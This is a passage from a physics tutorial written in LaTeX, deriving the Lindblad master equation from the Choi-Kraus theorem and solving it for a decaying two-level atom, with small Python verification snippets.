= \sum_{l=0}^{d^2-1} V^{\phantom{\dagger}}_l\op{i}{j} V_l^{\dagger}.
\end{eqnarray}
As $\op{i}{j}$ is an arbitrary element of a basis of ${\cal B}\pare{{\cal H}}$, any operator can be expanded in this basis and, by linearity,
\begin{equation}
{\cal V} \rho=\sum_{l=0}^{d^2-1} V^{\phantom{\dagger}}_l\rho V^{\dagger}_l,
\nonumber
\end{equation}
which is of the form (\ref{eq:choimap}) after the relabelling $V_l\to V_l^\dagger$.
\vspace{0.25 cm}
\noindent
\textbf{End of the proof.}
\vspace{0.5cm}
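Choi's Theorem has a practical numerical counterpart: a map is completely positive iff the operator ${\cal V}_2\pare{\proj{\Gamma}}$ of Eq. (\ref{eq:map2}), its Choi matrix, is positive. The sketch below (the helper function and tolerances are our own) confirms this for the identity map and for the transposition counterexample:

```python
import numpy as np

d = 2

def choi(channel):
    """Choi matrix C = sum_{ij} |i><j| (x) channel(|i><j|) of a map on d x d matrices."""
    C = np.zeros((d * d, d * d), dtype=complex)
    for i in range(d):
        for j in range(d):
            Eij = np.zeros((d, d), dtype=complex)
            Eij[i, j] = 1.0
            C += np.kron(Eij, channel(Eij))
    return C

C_id = choi(lambda X: X)     # identity map: Choi matrix is |Gamma><Gamma| >= 0
C_T  = choi(lambda X: X.T)   # transposition: Choi matrix is the SWAP operator

min_id = np.linalg.eigvalsh(C_id).min()   # >= 0: completely positive
min_T  = np.linalg.eigvalsh(C_T).min()    # = -1: positive but not completely positive
```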
\noindent
Thanks to Choi's Theorem, we know the general form of CP-maps, but there is still an issue to address. As density matrices should have trace one, we need to require any physical map to also be trace-preserving. This requirement gives us a new constraint that completely defines all CPT-maps, and it comes from the following theorem.
\vspace{0.5cm}
\begin{theorem}
Choi-Kraus' Theorem.
\noindent
A linear map ${\cal V}:B({\cal H})\to B({\cal H})$ is completely positive and trace-preserving iff it can be expressed as
\begin{equation}
{\cal V}\rho=\sum_l V_l^\dagger \rho V^{\phantom{\dagger}}_l
\label{eq:choi2}
\end{equation}
with $V_l\in B({\cal H})$ fulfilling
\begin{equation}
\sum_l V^{\phantom{\dagger}}_l V_l^\dagger=\mathbb 1_{{\cal H}}.
\label{eq:krauss}
\end{equation}
\end{theorem}
\vspace{0.5cm}
\noindent
\textbf{Proof.}
\noindent
We have already proved that any map of this form is completely positive; we only need to prove that it is trace-preserving iff the operators $V_l$ fulfil Eq. (\ref{eq:krauss}). The `if' direction follows from the linearity and the cyclic property of the trace,
\begin{equation}
\textrm{Tr}\cor{{\cal V}\rho}=\textrm{Tr} \cor{ \sum_{l} V_l^\dagger \rho V^{\phantom{\dagger}}_l } = \textrm{Tr} \cor{ \pare{\sum_{l} V^{\phantom{\dagger}}_l V_l^\dagger }\rho } =\textrm{Tr}\cor{\rho}.
\end{equation}
We also have to prove that a map of the form (\ref{eq:choi2}) is trace-preserving only if the operators $V_l$ fulfil (\ref{eq:krauss}). If the map is trace-preserving, applying it to an arbitrary element of a basis of ${\cal B}\pare{{\cal H}}$ should give
\begin{equation}
\textrm{Tr}\cor{{\cal V} \pare{\op{i}{j}}}=\textrm{Tr} \cor{\op{i}{j}}=\delta_{i,j}.
\end{equation}
As the map has the form (\ref{eq:choi2}), we can calculate this same trace in an alternative way,
\begin{eqnarray}
\textrm{Tr}\cor{{\cal V} \pare{\op{i}{j}}} &=& \textrm{Tr} \cor{ \sum_{l} V_l^\dagger \op{i}{j} V^{\phantom{\dagger}}_l }
= \textrm{Tr} \cor{ \sum_{l} V^{\phantom{\dagger}}_l V_l^\dagger \op{i}{j} } \nonumber \\
&= &\sum_{k} \bra{k} \pare{ \sum_{l} V^{\phantom{\dagger}}_l V_l^\dagger \op{i}{j} } \ket{k}
= \bra{j} \pare{\sum_{l} V^{\phantom{\dagger}}_l V_l^\dagger }\ket{i},
\end{eqnarray}
where $\left\{ \ket{k} \right\}$ is an arbitrary basis of ${\cal H}$.
As both equalities should be right we obtain
\begin{equation}
\bra{j} \pare{\sum_{l} V^{\phantom{\dagger}}_l V^\dagger_l }\ket{i} = \delta_{i,j},
\end{equation}
and therefore, the condition (\ref{eq:krauss}) should be fulfilled.
\vspace{0.25 cm}
\noindent
\textbf{End of the proof.}
\vspace{0.5cm}
\noindent
Operators $V_l$ of a map fulfilling condition (\ref{eq:krauss}) are called {\it Kraus operators}. Because of that, CPT-maps are sometimes also called {\it Kraus maps}, especially when they are presented as a collection of Kraus operators. Both concepts are ubiquitous in quantum information science. Kraus operators can also be time-dependent, as long as they fulfil relation (\ref{eq:krauss}) at all times.
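A standard textbook example (our own, not from the text) is the amplitude-damping channel. Here we use the common convention ${\cal V}\rho=\sum_l K^{\phantom{\dagger}}_l\rho K_l^\dagger$ with $\sum_l K_l^\dagger K^{\phantom{\dagger}}_l=\mathbb 1$, which is equivalent to (\ref{eq:krauss}) under the relabelling $V_l\to V_l^\dagger$. The sketch verifies the Kraus condition and that the channel maps a state to a state:

```python
import numpy as np

p  = 0.3                                              # illustrative damping probability
K0 = np.array([[1.0, 0.0], [0.0, np.sqrt(1 - p)]])    # no-decay Kraus operator
K1 = np.array([[0.0, np.sqrt(p)], [0.0, 0.0]])        # decay Kraus operator

completeness = K0.conj().T @ K0 + K1.conj().T @ K1    # should equal the identity

rho = np.array([[0.25, 0.25], [0.25, 0.75]])          # a valid input state
out = K0 @ rho @ K0.conj().T + K1 @ rho @ K1.conj().T # channel output
```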
At this point, we already know the form of CPT-maps, but we do not yet have a master equation, that is, a differential equation describing the continuous time evolution. We know how to perform an arbitrary operation on a system, but not how to describe its evolution in time. To do so, we need to find a time-independent generator ${\cal L}$ such that
\begin{equation}
\frac{d}{dt} \rho\pare{t}= {\cal L}\rho(t),
\label{eq:difeq}
\end{equation}
and therefore our CPT-map can be expressed as ${\cal V}(t)=e^{{\cal L} t}$. The following calculation aims at finding the explicit expression of ${\cal L}$. We start by choosing an orthonormal basis of the space of bounded operators ${\cal B}({\cal H})$, $\key{F_i}_{i=1}^{d^2}$. To be orthonormal, it should satisfy the condition
\begin{equation}
\bbracket{F_i}{F_j}\equiv \textrm{Tr}\cor{F_i^\dagger F_j}=\delta_{i,j}.
\label{eq:orthonormal}
\end{equation}
Without any loss of generality, we select one of the elements of the basis to be proportional to the identity, $F_{d^2}=\frac{1}{\sqrt{d}} \mathbb 1_{{\cal H}}$. It is trivial to prove that the norm of this element is one, and it is easy to see from Eq. (\ref{eq:orthonormal}) that all the other elements of the basis should have trace zero.
\begin{equation}
\textrm{Tr}\cor{F_i}=0 \qquad \forall i=1,\dots,d^2-1.
\end{equation}
The closure relation of this basis is $\mathbb 1_{{\cal B}({\cal H})}=\sum_i \bproj{F_i}{F_i}$. Therefore, the Kraus operators can be expanded in this basis by using the Fock-Liouville notation
\begin{equation}
V_l(t)= \sum_{i=1}^{d^2} \bbracket{F_i}{V_l(t)} \kket{F_i}.
\label{eq:kraussexpansion}
\end{equation}
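For $d=2$ the normalised Pauli matrices, with $F_4=\frac{1}{\sqrt 2}\mathbb 1$, provide exactly such an orthonormal basis, and the expansion coefficients are $\bbracket{F_i}{V}=\textrm{Tr}\cor{F_i^\dagger V}$. A quick NumPy check (our own example, with a randomly generated operator):

```python
import numpy as np

sx = np.array([[0, 1], [1, 0]], dtype=complex)
sy = np.array([[0, -1j], [1j, 0]])
sz = np.diag([1.0 + 0j, -1.0])
F = [m / np.sqrt(2) for m in (sx, sy, sz, np.eye(2))]   # orthonormal operator basis

# orthonormality: Tr[F_i^dag F_j] = delta_ij
gram = np.array([[np.trace(Fi.conj().T @ Fj) for Fj in F] for Fi in F])

# expansion of an arbitrary operator, V = sum_i Tr[F_i^dag V] F_i
rng = np.random.default_rng(0)
V = rng.standard_normal((2, 2)) + 1j * rng.standard_normal((2, 2))
V_rebuilt = sum(np.trace(Fi.conj().T @ V) * Fi for Fi in F)
```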
As the map ${\cal V}(t)$ is of the form (\ref{eq:choimap}), we can apply (\ref{eq:kraussexpansion}) to obtain\footnote{For simplicity, in this discussion we omit the explicit time-dependency of the density matrix.}
\begin{equation}
\hspace{-2cm}
{\cal V}(t) \rho = \sum_l\cor{\sum_{i=1}^{d^2} \bbracket{F_i}{V_l(t)} F_i \;\rho \sum_{j=1}^{d^2} F_j^\dagger \bbracket{V_l(t)}{F_j}}
= \sum_{i,j=1}^{d^2} c_{i,j}(t) F_i^{\phantom{\dagger}}\rho F_j^{\dagger},
\end{equation}
where we have absorbed the summation over the Kraus operators into the coefficients $c_{i,j}(t)= \sum_l \bbracket{F_i}{V_l(t)} \bbracket{V_l(t)}{F_j}$. We now go back to the original problem by inserting this expansion into the time derivative of Eq. (\ref{eq:difeq}),
\begin{eqnarray}
\frac{d \rho }{dt} &=&\lim_{\Delta t\to0} \frac{1}{\Delta t} \pare{{\cal V}(\Delta t)\rho-\rho}
= \lim_{\Delta t\to 0} \frac{1}{\Delta t} \pare{\sum_{i,j=1}^{d^2} c_{i,j}(\Delta t) F_i^{\phantom{\dagger}} \rho F_j^\dagger - \rho} \nonumber\\
&=& \lim_{\Delta t\to 0} \frac{1}{\Delta t} \left( \sum_{i,j=1}^{d^2-1} c_{i,j}(\Delta t) F_i^{\phantom{\dagger}}\rho F_j^\dagger + \sum_{i=1}^{d^2-1} c_{i,d^2}(\Delta t) F_i^{\phantom{\dagger}}\rho F_{d^2}^\dagger \right. \nonumber\\
&&\left. + \sum_{j=1}^{d^2-1} c_{d^2,j} (\Delta t) F_{d^2}^{\phantom{\dagger}} \rho F_j^\dagger + c_{d^2,d^2}(\Delta t) F_{d^2}^{\phantom{\dagger}} \rho F_{d^2}^\dagger - \rho \right),
\end{eqnarray}
where we have separated the summations to take into account that $F_{d^2}=\frac{1}{\sqrt{d}}\mathbb 1_{{\cal H}}$. By using this property this equation simplifies to
\begin{eqnarray}
\frac{d \rho}{dt} &=&\lim_{\Delta t\to0} \frac{1}{\Delta t} \left( \sum_{i,j=1}^{d^2-1} c_{i,j}(\Delta t) F_i^{\phantom{\dagger}} \rho F_j^\dagger + \frac{1}{\sqrt{d}} \sum_{i=1}^{d^2-1}
c_{i,d^2}(\Delta t) F_i^{\phantom{\dagger}}\rho \right. \nonumber\\
&+&\left. \frac{1}{\sqrt{d}} \sum_{j=1}^{d^2-1} c_{d^2,j} (\Delta t) \rho F_j^\dagger + \frac{1}{d} c_{d^2,d^2}(\Delta t) \rho-\rho \right).
\label{eq:derivative2}
\end{eqnarray}
The next step is to eliminate the explicit dependence on time. To do so, we define new coefficients that absorb the time intervals in the limit.
\begin{eqnarray}
g_{i,j}&\equiv& \lim_{\Delta t\to 0} \frac{c_{i,j} (\Delta t) }{\Delta t} \qquad (i,j<d^2), \nonumber\\
g_{i,d^2}&\equiv& \lim_{\Delta t \to 0} \frac{c_{i,d^2} (\Delta t) }{\Delta t} \qquad (i<d^2), \nonumber\\
g_{d^2,j}&\equiv& \lim_{\Delta t \to 0} \frac{c_{d^2,j} (\Delta t) }{\Delta t} \qquad (j<d^2), \\
g_{d^2,d^2}&\equiv& \lim_{\Delta t\to 0} \frac{c_{d^2,d^2}(\Delta t)-d}{\Delta t}. \nonumber
\end{eqnarray}
Introducing these coefficients into Eq. (\ref{eq:derivative2}), we obtain an equation with no explicit dependence on time.
\begin{eqnarray}
\frac{d \rho}{dt} = \sum_{i,j=1}^{d^2-1} g_{i,j} F_i \rho F_j^\dagger + \frac{1}{\sqrt{d}} \sum_{i=1}^{d^2-1} g_{i,d^2} F_i \rho + \frac{1}{\sqrt{d}} \sum_{j=1}^{d^2-1} g_{d^2,j} \rho F_j^\dagger + \frac{g_{d^2,d^2}}{d} \rho.\nonumber \\
\label{eq:derivative3}
\end{eqnarray}
As we are already summing over all the Kraus operators, it is useful to define a new operator
\begin{equation}
F\equiv \frac{1}{\sqrt{d}} \sum_{i=1}^{d^2-1} g_{i,d^2} F_i.
\end{equation}
Applying this definition to Eq. (\ref{eq:derivative3}) gives
\begin{equation}
\frac{d \rho}{dt} = \sum_{i,j=1}^{d^2-1} g_{i,j} F_i \rho F_j^\dagger + F \rho + \rho F^\dagger + \frac{g_{d^2,d^2}}{d} \rho.
\label{eq:derivative4}
\end{equation}
At this point, we want to separate the dynamics of the density matrix into a coherent part (equivalent to the von Neumann equation) and an incoherent part. We split the operator $F$ into its Hermitian and anti-Hermitian parts.
\begin{equation}
F=\frac{F+F^\dagger}{2} + i\frac{F-F^\dagger}{2i} \equiv G-iH,
\end{equation}
where we have used the notation $H$ for the Hermitian part for obvious reasons. If we take this definition to Eq. (\ref{eq:derivative4}) we obtain
\begin{equation}
\frac{d \rho}{dt} = \sum_{i,j=1}^{d^2-1} g_{i,j} F_i \rho F_j^\dagger + \key{G,\rho} - i \cor{H,\rho} + \frac{g_{d^2,d^2}}{d} \rho.
\end{equation}
We now define the last operator of this proof, $G_2\equiv G+\frac{g_{d^2,d^2}}{2d}\mathbb 1_{\cal H}$, and the time derivative becomes
\begin{equation}
\frac{d \rho}{dt} = \sum_{i,j=1}^{d^2-1} g_{i,j} F_i \rho F_j^\dagger + \key{G_2,\rho} -i\cor{H,\rho}.
\end{equation}
Until now we have imposed the complete positivity of the map, as we have required it to be written in terms of Kraus operators, but we have not used the trace-preserving property. We now impose this property, and by using the cyclic property of the trace, we obtain a new condition
\begin{equation}
\textrm{Tr}\cor{\frac{d \rho}{dt}}=\textrm{Tr}\cor{ \sum_{i,j=1}^{d^2-1} g_{i,j} F_j^\dagger F_i \rho + 2 G_2 \rho }=0.
\end{equation}
Therefore, $G_2$ should fulfil
\begin{equation}
G_2=-\frac{1}{2} \sum_{i,j=1}^{d^2-1} g_{i,j} F_j^\dagger F_i.
\end{equation}
By applying this condition, we arrive at the Lindblad master equation
\begin{equation}
\frac{d \rho}{dt}= -i\cor{H,\rho} + \sum_{i,j=1}^{d^2-1} g_{i,j} \pare{ F_i^{\phantom{\dagger}}\rho F_j^\dagger - \frac{1}{2} \key{F_j^\dagger F_i^{\phantom{\dagger}},\rho }}.
\end{equation}
Finally, the coefficients $g_{i,j}$ form by construction a Hermitian, and therefore diagonalisable, matrix. By diagonalising it, we obtain the diagonal form of the Lindblad master equation.
\begin{equation}
\frac{d}{dt} \rho= -i \cor{H,\rho} + \sum_{k} \Gamma_k \pare{ L_k^{\phantom{\dagger}} \rho L_k^\dagger - \frac{1}{2} \key{L_k^\dagger L_k^{\phantom{\dagger}},\rho}} \equiv {\cal L} \rho.
\label{eq:lindblad}
\end{equation}
\subsection{Properties of the Lindblad Master Equation}
Some interesting properties of the Lindblad equation are:
\begin{itemize}
\item Under a Lindblad dynamics, if all the jump operators are Hermitian, the purity of a system fulfils $\frac{d}{dt}\pare{ \textrm{Tr} \cor{\rho^2 }} \le 0$. The proof is given in \ref{sec:purity}.
\item The Lindblad Master Equation is invariant under unitary transformations of the jump operators
\begin{equation}
\sqrt{\Gamma_i} L_i\to \sqrt{\Gamma'_i} L_i'= \sum_j v_{ij} \sqrt{\Gamma_j} L_j,
\end{equation}
with $v$ representing a unitary matrix. It is also invariant under inhomogeneous transformations in the form
\begin{eqnarray}
L_i &\to& L'_i= L_i + a_i \nonumber\\
H&\to& H'=H+\frac{1}{2i} \sum_j \Gamma_j \pare{a_j^* L_j - a_j L_j^\dagger }+ b,
\end{eqnarray}
where $a_i \in \mathbb{C}$ and $b \in \mathbb{R}$. The proof of this can be found in Ref. \cite{breuer_02} (Section 3).
\item Thanks to the previous properties, it is always possible to choose traceless jump operators without loss of generality.
\end{itemize}
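The invariance under unitary mixing of the jump operators can be checked numerically. The following pure-Python sketch (the jump operators $\sigma^{\pm}$, the rates and the mixing angle are arbitrary choices for illustration) verifies that the dissipative part of the Lindblad equation is unchanged when the rescaled operators $\sqrt{\Gamma_i}L_i$ are mixed by a unitary matrix:

```python
import math

# 2x2 complex matrices as nested lists; minimal helpers.
def mmul(A, B):
    return [[sum(A[i][k] * B[k][j] for k in range(2)) for j in range(2)]
            for i in range(2)]

def madd(A, B):
    return [[A[i][j] + B[i][j] for j in range(2)] for i in range(2)]

def scal(c, A):
    return [[c * A[i][j] for j in range(2)] for i in range(2)]

def dag(A):
    return [[A[j][i].conjugate() for j in range(2)] for i in range(2)]

def dissipator(L, rho):
    # D(L) rho = L rho L^dag - (1/2){L^dag L, rho}
    LdL = mmul(dag(L), L)
    anti = madd(mmul(LdL, rho), mmul(rho, LdL))
    return madd(mmul(mmul(L, rho), dag(L)), scal(-0.5, anti))

sm = [[0, 0], [1, 0]]                     # sigma- (decay)
sp = [[0, 1], [0, 0]]                     # sigma+ (excitation)
G1, G2 = 0.3, 0.7                         # arbitrary rates
rho = [[0.6, 0.1 + 0.2j], [0.1 - 0.2j, 0.4]]   # arbitrary Hermitian state

# Dissipative part with the original jump operators
orig = madd(scal(G1, dissipator(sm, rho)), scal(G2, dissipator(sp, rho)))

# Mix the rescaled operators sqrt(G_i) L_i with a unitary (here a rotation)
c, s = math.cos(0.4), math.sin(0.4)
L1 = madd(scal(c * math.sqrt(G1), sm), scal(s * math.sqrt(G2), sp))
L2 = madd(scal(-s * math.sqrt(G1), sm), scal(c * math.sqrt(G2), sp))
mixed = madd(dissipator(L1, rho), dissipator(L2, rho))

max_diff = max(abs(orig[i][j] - mixed[i][j]) for i in range(2) for j in range(2))
print(max_diff)
```

Since the identity $\sum_i v_{ij}v_{ik}^*=\delta_{jk}$ is exact for a unitary $v$, the two dissipators agree up to floating-point rounding.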
\newpage
\vspace{0.5cm}
\begin{center}
\framebox[15.5cm][l]{
\begin{minipage}[l]{15cm}
\vspace{0.25cm}
{\bf Box 6. A master equation for a two-level system with decay.}
\vspace{0.25cm}
Continuing our example of a two-level atom, we can make it more realistic by including the possibility of atomic decay by the emission of a photon. This emission happens due to the interaction of the atom with the surrounding vacuum\footnote{This is why atoms decay.}. The complete quantum system would in this case be the `atom+vacuum' system, and its time evolution would be given by the von Neumann equation (\ref{eq:vne}), where $H$ represents the total `atom+vacuum' Hamiltonian. This system belongs to an infinite-dimensional Hilbert space, as the radiation field has infinitely many modes. If we are interested only in the time-dependent state of the atom, we can derive a Markovian master equation for the reduced density matrix of the atom (see for instance Refs. \cite{breuer_02,gardiner_00}). The master equation we will study is
\begin{eqnarray}
\frac{d}{dt}\rho(t) = -i\cor{H,\rho} + \Gamma \left( \sigma^- \rho \sigma^+ -\frac{1}{2} \left\{\sigma^+ \sigma^-,\rho \right\} \right),
\label{eq:lindtotal}
\end{eqnarray}
where $\Gamma$ is the coupling between the atom and the vacuum.
In the Fock-Liouville space (following the same ordering as in Eq. (\ref{eq:denmat})) the Liouvillian corresponding to evolution (\ref{eq:lindtotal}) is
\begin{equation}
{\cal L}=
\left(
\begin{array}{cccc}
0 & i \Omega & -i\Omega & \Gamma \\
i\Omega & -i E - \frac{\Gamma}{2} & 0 & -i\Omega\\
-i\Omega & 0 & i E -\frac{\Gamma}{2} & i\Omega \\
0 & -i\Omega & i\Omega & -\Gamma \\
\end{array}
\right).
\label{eq:liou2}
\end{equation}
Expressing explicitly the set of differential equations we obtain
\begin{eqnarray}
\dot{\rho}_{00} &= & i \Omega \rho_{01} -i\Omega \rho_{10} + \Gamma \rho_{11} \nonumber \\
\dot{\rho}_{01} &=& i\Omega \rho_{00} - \pare{ iE + \frac{\Gamma}{2} } \rho_{01} -i\Omega \rho_{11} \nonumber\\
\dot{\rho}_{10} &=& -i\Omega \rho_{00} + \pare{ i E - \frac{\Gamma}{2}} \rho_{10} + i\Omega \rho_{11} \\
\dot{\rho}_{11} &=& -i\Omega \rho_{01} + i\Omega \rho_{10} -\Gamma \rho_{11} \nonumber
\end{eqnarray}
\vspace{0.25cm}
\label{minipage5}
\end{minipage}
}
\end{center}
\vspace{0.5cm}
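The structure of the Liouvillian of Box 6 can be verified numerically. The pure-Python sketch below (the values of $\Omega$, $E$ and $\Gamma$ are arbitrary) checks that the rows acting on $\rho_{00}$ and $\rho_{11}$ cancel entry by entry, so the trace is preserved, and that the derivative of a Hermitian density matrix remains Hermitian; for the latter, the $(3,3)$ entry is taken as $iE-\Gamma/2$, the complex conjugate counterpart of the $(2,2)$ entry:

```python
# Sanity checks on the Liouvillian of Box 6, basis (rho00, rho01, rho10, rho11).
Om, E, G = 1.0, 1.0, 0.1   # arbitrary illustrative values

L = [
    [0,        1j*Om,        -1j*Om,        G     ],
    [1j*Om,   -1j*E - G/2,    0,           -1j*Om ],
    [-1j*Om,   0,             1j*E - G/2,   1j*Om ],
    [0,       -1j*Om,         1j*Om,       -G     ],
]

def apply(L, v):
    return [sum(L[i][j] * v[j] for j in range(4)) for i in range(4)]

# Trace preservation: d(rho00 + rho11)/dt = 0 for every rho, i.e. the
# rho00-row and the rho11-row of L cancel entry by entry.
assert all(abs(L[0][j] + L[3][j]) < 1e-14 for j in range(4))

# Hermiticity preservation: for a Hermitian rho (rho10 = conj(rho01)),
# the derivative satisfies d(rho10)/dt = conj(d(rho01)/dt).
rho = [0.6, 0.1 + 0.2j, 0.1 - 0.2j, 0.4]
drho = apply(L, rho)
herm_err = abs(drho[2] - drho[1].conjugate())
print(herm_err)
```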
\newpage
\section{Resolution of the Lindblad Master Equation}
\label{sec:resolution}
\subsection{Integration}
To calculate the time evolution of a system governed by a master equation of the form (\ref{eq:lindtotal}), we need to solve a set of coupled equations with as many variables as elements of the density matrix. In our example, this means solving a set of four coupled equations, but the dimension of the problem increases exponentially with the system size. Because of this, dimension-reduction techniques are required for bigger systems.
There are several canonical algorithms to solve such systems of ordinary differential equations. Analytical solutions exist only for a few simple systems, sometimes requiring sophisticated techniques such as damping bases \cite{briegel:pra93}. In most cases, we have to rely on approximate numerical methods. One of the most popular approaches is the $4^{th}$-order Runge-Kutta algorithm (see, for instance, \cite{numericalrecipes} for an explanation of the algorithm). By integrating the equations of motion, we can calculate the density matrix at any time $t$.
The steady-state of a system can be obtained by evolving it for a long time $\pare{t \rightarrow \infty}$. Unfortunately, this method presents two difficulties. First, if the dimension of the system is large, the computing time becomes huge. This means that for systems beyond a few qubits, it takes too long to reach the steady-state. Even worse is the problem of the stability of the algorithms for integrating differential equations. Due to small errors in the calculation of derivatives by the use of finite differences, the trace of the density matrix may not remain equal to one. This error accumulates during the propagation of the state, giving unphysical results after a finite time. One solution to this problem is the use of algorithms specifically designed to preserve the trace, such as the Crank-Nicolson algorithm \cite{goldberg:ajp67}. The problem with these algorithms is that they consume more computational power than Runge-Kutta, and therefore they are not well suited to calculating the long-time behaviour of big systems. An analysis of different methods and their advantages and disadvantages can be found in Ref. \cite{riesch:jcp19}.
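As an illustration, the following pure-Python sketch integrates the master equation of Box 6 with a $4^{th}$-order Runge-Kutta scheme in the Fock-Liouville space. For simplicity we set $\Omega=0$ (and drop the energy $E$, which then only rotates the vanishing coherences), so that the excited-state population must decay as $\rho_{11}(t)=e^{-\Gamma t}$; the step size and parameters are arbitrary:

```python
import math

G = 0.1   # decay rate Gamma (arbitrary)
# Liouvillian for Omega = 0, basis (rho00, rho01, rho10, rho11);
# the -iE rotation of the coherences is dropped since they stay zero here.
L = [
    [0,  0,    0,    G ],
    [0, -G/2,  0,    0 ],
    [0,  0,   -G/2,  0 ],
    [0,  0,    0,   -G ],
]

def apply(L, v):
    return [sum(L[i][j] * v[j] for j in range(4)) for i in range(4)]

def axpy(a, x, y):
    return [a * xi + yi for xi, yi in zip(x, y)]

def rk4_step(v, dt):
    k1 = apply(L, v)
    k2 = apply(L, axpy(dt / 2, k1, v))
    k3 = apply(L, axpy(dt / 2, k2, v))
    k4 = apply(L, axpy(dt, k3, v))
    return [v[i] + dt / 6 * (k1[i] + 2 * k2[i] + 2 * k3[i] + k4[i])
            for i in range(4)]

v, dt, steps = [0.0, 0.0, 0.0, 1.0], 0.01, 1000   # start in the excited state
for _ in range(steps):
    v = rk4_step(v, dt)

t = dt * steps
trace_err = abs(v[0] + v[3] - 1)                 # trace must stay one
decay_err = abs(v[3] - math.exp(-G * t))         # exact exponential decay
print(trace_err, decay_err)
```

Here the trace is preserved to rounding accuracy because the two population rows of the Liouvillian cancel exactly; for generic schemes this is precisely the property that degrades over long integrations, as discussed above.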
\vspace{.35cm}
\begin{center}
\framebox[15.5cm][l]{
\begin{minipage}[l]{15cm}
\vspace{0.25cm}
{\bf Box 7. Time dependency of the two-level system with decay.}
\vspace{0.25cm}
In this box we show some results of solving Eq. (\ref{eq:lindtotal}) and calculating the density matrix as a function of time. A Mathematica notebook solving this problem can be found at \cite{notebook}. To illustrate the time behaviour of this system, we calculate the evolution for different state parameters. In all cases, we start with an initial state in which the atom is excited, $\rho_{11}=1$, with no coherence between different states, meaning $\rho_{01}=\rho_{10}=0$. If the decay parameter $\Gamma$ is equal to zero, the problem reduces to solving the von Neumann equation, and the result is displayed in Figure \ref{figure1}. The other extreme case would be a system with no coherent dynamics ($\Omega=0$) but with decay. In this case, we observe an exponential decay of the population of the excited state. Finally, we can calculate the dynamics of a system with both coherent driving and decay. In this case, both behaviours coexist: there are oscillations as well as decay.
\begin{center}
\includegraphics[scale=.5]{figure2}
\includegraphics[scale=.5]{figure3}
\captionof{figure}{Left: Population dynamics under purely incoherent dynamics ($\Gamma=0.1,\; n=1,\; \Omega=0,\; E=1$). Right: Population dynamics under both coherent and incoherent dynamics ($\Gamma=0.1,\; n=1,\; \Omega=1,\; E=1)$. In both plots the blue line represents $\rho_{11}$ and the orange one $\rho_{00}$.}
\end{center}
\vspace{0.1cm}
\end{minipage}
\label{minipage6}
}
\end{center}
\newpage
\subsection{Diagonalisation}
As we have discussed before, in the Fock-Liouville space the Liouvillian corresponds to a matrix (in general complex, non-Hermitian, and non-symmetric). By diagonalising it we can calculate both the time evolution and the steady state of the density matrix. For most purposes, in the short-time regime integrating the differential equations may be more efficient than diagonalising. This is due to the high dimensionality of the Liouvillian, which makes the diagonalisation process very costly in computing power. On the other hand, to calculate the steady state, diagonalisation is the most used method due to the problems of integrating the equations of motion discussed in the previous section.
Let us first see how to use diagonalisation to calculate the time evolution of a system. As the Liouvillian matrix is non-Hermitian, we cannot apply the spectral theorem to it, and it may have different left and right eigenvectors. For a specific eigenvalue $\Lambda_i$ we can obtain the eigenvectors $\kket{\Lambda_i^R}$ and $\bbra{\Lambda_i^L}$ such that
\begin{eqnarray}
\hspace{2cm}
\tilde{{\cal L}} \; \kket{\Lambda_i^R} = \Lambda_i \kket{\Lambda_i^R} \nonumber\\
\hspace{2cm}
\bbra{\Lambda_i^L}\; \tilde{{\cal L}} = \Lambda_i \bbra{\Lambda_i^L}
\end{eqnarray}
An arbitrary state can be expanded in the eigenbasis of $\tilde{{\cal L}}$ as \cite{thingna:sr16,gardiner_00}
\begin{equation}
\kket{\rho(0)}= \sum_i \kket{\Lambda_i^R} \bbracket{\Lambda_i^L}{\rho(0)}.
\end{equation}
Therefore, the state of the system at a time $t$ can be calculated in the form
\begin{equation}
\kket{\rho(t)}= \sum_i e^{\Lambda_i t} \kket{\Lambda_i^R} \bbracket{\Lambda_i^L}{\rho(0)}.
\end{equation}
Note that in this case, to calculate the state at a time $t$, we do not need to integrate over the interval $\cor{0,t}$, as we would have to do with a numerical solution of the set of differential equations. This is an advantage when we want to calculate the long-time behaviour. Furthermore, to calculate the steady state of a system, we can look for the eigenvector with zero eigenvalue, as this is the only one that survives when $t\to\infty$.
For any finite system, Evans' theorem ensures the existence of at least one zero eigenvalue of the Liouvillian matrix \cite{evans:cmp77,evans:jfa79}. The eigenvector corresponding to this zero eigenvalue is the steady state of the system. In exceptional cases, a Liouvillian can present more than one zero eigenvalue due to the presence of symmetries in the system \cite{buca:njp12,manzano:prb14,manzano:av18}. This is a non-generic case, and for most purposes we can assume the existence of a unique fixed point of the dynamics. Therefore, diagonalisation can be used to calculate the steady state without calculating the full evolution of the system. This can even be done analytically for small systems, and when numerical approaches are required this technique gives better precision than integrating the equations of motion. The spectrum of Liouvillian superoperators has been analysed in several recent papers \cite{albert:pra14,thingna:sr16}.
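In practice, the steady state can also be obtained without computing the full spectrum, by solving ${\cal L}\kket{\rho_{SS}}=0$ together with the trace condition. The pure-Python sketch below (arbitrary parameter values; the $(3,3)$ entry of the Liouvillian is taken as $iE-\Gamma/2$, the conjugate counterpart of the $(2,2)$ entry, so that hermiticity is preserved) replaces the last, linearly dependent row of ${\cal L}$ by the trace constraint $\rho_{00}+\rho_{11}=1$ and solves the resulting linear system by Gaussian elimination:

```python
# Steady state of the two-level system with decay, basis (rho00, rho01, rho10, rho11).
Om, E, G = 1.0, 1.0, 0.1   # arbitrary illustrative values

L = [
    [0,        1j*Om,        -1j*Om,        G     ],
    [1j*Om,   -1j*E - G/2,    0,           -1j*Om ],
    [-1j*Om,   0,             1j*E - G/2,   1j*Om ],
    [0,       -1j*Om,         1j*Om,       -G     ],
]

# The rows of L are linearly dependent (trace preservation), so replace the
# last row by the trace constraint rho00 + rho11 = 1.
A = [row[:] for row in L[:3]] + [[1, 0, 0, 1]]
b = [0, 0, 0, 1]

def solve(A, b):
    # Gaussian elimination with partial pivoting, complex entries.
    n = len(b)
    M = [A[i][:] + [b[i]] for i in range(n)]
    for c in range(n):
        p = max(range(c, n), key=lambda r: abs(M[r][c]))
        M[c], M[p] = M[p], M[c]
        for r in range(c + 1, n):
            f = M[r][c] / M[c][c]
            M[r] = [M[r][k] - f * M[c][k] for k in range(n + 1)]
    x = [0] * n
    for r in range(n - 1, -1, -1):
        x[r] = (M[r][n] - sum(M[r][k] * x[k] for k in range(r + 1, n))) / M[r][r]
    return x

rho_ss = solve(A, b)
# The solution must lie in the kernel of the full Liouvillian and have trace one.
residual = max(abs(sum(L[i][j] * rho_ss[j] for j in range(4))) for i in range(4))
print(residual, abs(rho_ss[0] + rho_ss[3] - 1))
```

Because trace preservation makes the dropped row a linear combination of the others, the solution of the reduced system automatically annihilates the full Liouvillian.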
\newpage
\vspace{0.5cm}
